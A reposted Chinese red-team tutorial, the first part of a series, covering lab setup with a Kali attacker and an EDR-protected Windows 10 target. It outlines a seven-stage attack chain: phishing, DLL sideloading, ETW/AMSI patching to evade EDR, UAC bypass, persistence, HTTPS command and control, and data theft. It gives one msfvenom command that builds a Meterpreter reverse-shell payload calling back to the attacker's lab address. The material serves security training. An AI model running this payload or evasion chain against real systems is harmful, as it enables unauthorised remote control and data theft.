2026-04-18 07:29:44 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文详细讲解红队实战演练的环境搭建与攻击链设计。通过配置Kali攻击机与搭载EDR的Win10靶机，构建了七阶段攻击链：钓鱼初始访问、白加黑执行、PatchETW与AMSI绕过EDR、UAC提权、注册表持久化、HTTPS隐蔽C2及数据窃取。结合Metasploit与donut等工具给出具体命令示例，为安全人员提供了可操作性强的免杀对抗实战参考。 综合评分： 78 文章分类： 红队,实战经验,免杀,渗透测试,内网渗透

cover_image

综合实战演练（上）——环境搭建与攻击设计

原创

pandazhengzheng pandazhengzheng

安全分析与研究

2026年4月16日 08:30 广东

在小说阅读器读本章

去阅读

一、前言概述

本课将进行综合实战演练，包括实验环境搭建、攻击链设计和工具组合使用，通过实践，将能够综合运用所学技术。

二、相关内容

2.1 实验环境搭建

2.1.1 环境要求

硬件要求：

CPU: 4核心以上
内存: 16GB以上
硬盘: 100GB以上

软件要求：

宿主机: Windows 10/11 或 Linux
虚拟化软件: VMware Workstation / VirtualBox
虚拟机: Windows 10/11

2.1.2 虚拟机配置

攻击机（Kali Linux）：

- 操作系统: Kali Linux 2023.x
- 内存: 4GB
- 硬盘: 50GB
- 网络: NAT或桥接
- 工具: Metasploit, Cobalt Strike, Visual Studio Code

靶机（Windows 10）：

- 操作系统: Windows 10 21H2
- 内存: 8GB
- 硬盘: 60GB
- 网络: NAT或桥接
- EDR: Windows Defender / CrowdStrike试用版
- 工具: Visual Studio 2022, x64dbg, Process Monitor

2.1.3 网络配置

攻击机: 192.168.1.100
靶机: 192.168.1.101 + EDR

2.1.4 工具安装

攻击机工具：

sudo apt update && sudo apt upgrade -y
sudo apt install metasploit-framework -y
sudo apt install mingw-w64 nasm -y
sudo snap install code --classic

靶机工具：

# 安装Visual Studio 2022
# 安装x64dbg
# 安装Process Monitor
# 安装Python

2.2 攻击链设计

2.2.1 攻击目标

目标：在安装了EDR的Windows 10系统上执行恶意代码，并绕过EDR检测。

要求：

不触发EDR告警
获得持久化访问
执行后续操作（如数据窃取）

2.2.2 攻击链设计

1. 初始访问
&nbsp; &nbsp;└─▶ 钓鱼邮件 / 漏洞利用

2. 执行
&nbsp; &nbsp;└─▶ 白+黑技术加载恶意DLL

3. 绕过EDR
&nbsp; &nbsp;└─▶ Patch ETW/AMSI

4. 权限提升
&nbsp; &nbsp;└─▶ UAC绕过

5. 持久化
&nbsp; &nbsp;└─▶ 注册表 / 计划任务

6. 命令与控制
&nbsp; &nbsp;└─▶ RPC隧道 / HTTPS

7. 数据窃取
&nbsp; &nbsp;└─▶ 文件搜索 / 屏幕截图

2.2.3 技术选择

2.3 工具组合使用

2.3.1 生成恶意DLL

使用donut生成Shellcode：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shellcode.bin

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全分析与研究 pandazhengzheng pandazhengzheng《综合实战演练（上）——环境搭建与攻击设计》